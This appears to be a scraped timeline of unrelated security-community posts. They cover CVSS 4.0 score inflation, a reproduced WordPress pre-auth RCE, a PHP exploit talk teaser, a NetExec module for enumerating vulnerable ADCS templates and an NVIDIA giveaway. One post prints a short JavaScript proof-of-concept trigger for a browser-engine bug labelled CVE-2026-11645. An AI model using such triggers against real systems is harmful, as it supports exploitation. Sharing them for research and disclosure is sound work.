I’m significantly older than you. I started coding in the late 60s. My current strategy is to not read any of the code written by my agents. That’s the only way I can take advantage of their productivity. What I do instead is to surround the agents with extreme constraints. Unit tests, gherkin tests, QA procedures, quality metrics, mutation testing, test coverage, and a plethora of others. In the end, I have very high confidence in the code they produce because they’ve had to run the gauntlet of all of my constraints and tests.
Can you spot the bypass technique?
if you can't, don't worry about it, Just wait for the new challenges on https://t.co/FyxMJriUNm, they'll teach you :D
@spendergrsec Agree.
Additionally, since the introduction of CVSS 4.0, scores have become noticeably inflated, resulting in far more meaningless "High" and "Critical" ratings.
This is seriously disrupting downstream vendors' vulnerability triage and prioritization.
We've reproduced the pre-auth RCE chain in Wordpress (wp2shell). It's real, patch!
Shoutout to @hash_kitten at Assetnote for catching such an awesome bug!
(CVE-2026-11645)[$55000][506689381][objects]
PoC:
```
let key = 'AA';
let value = 2;
class C extends Function {
[key] = value;
}
let o1 = new C('\'use strict\'');
value = 1.1;
let o2 = new C('\'use strict\'');
```
See you on Vegas!
Will share one of the most exciting exploit tricks I have found with @Nyaaaaa_ovo
Remote 1-byte OOB �� ASLR leak → full RCE
on the hardened PHP using built-in, remotely sprayable obects.
(can you make https://t.co/j20dpbvRwp work on the latest PHP?)
A new NetExec module: certipy-find🔥
As ADCS is still configured insecurely in many environments, I decided to integrate the certipy find command into NetExec.
Now you can quickly find and enumerate vulnerable templates before bringing out the big guns.
5 days to CES.
5 classic cards up for grabs.
ALL signed by NVIDIA CEO Jensen Huang 👀
Up first: GeForce 256, the world's 1st GPU
Want it? Comment #GeForceGreats for a chance to win...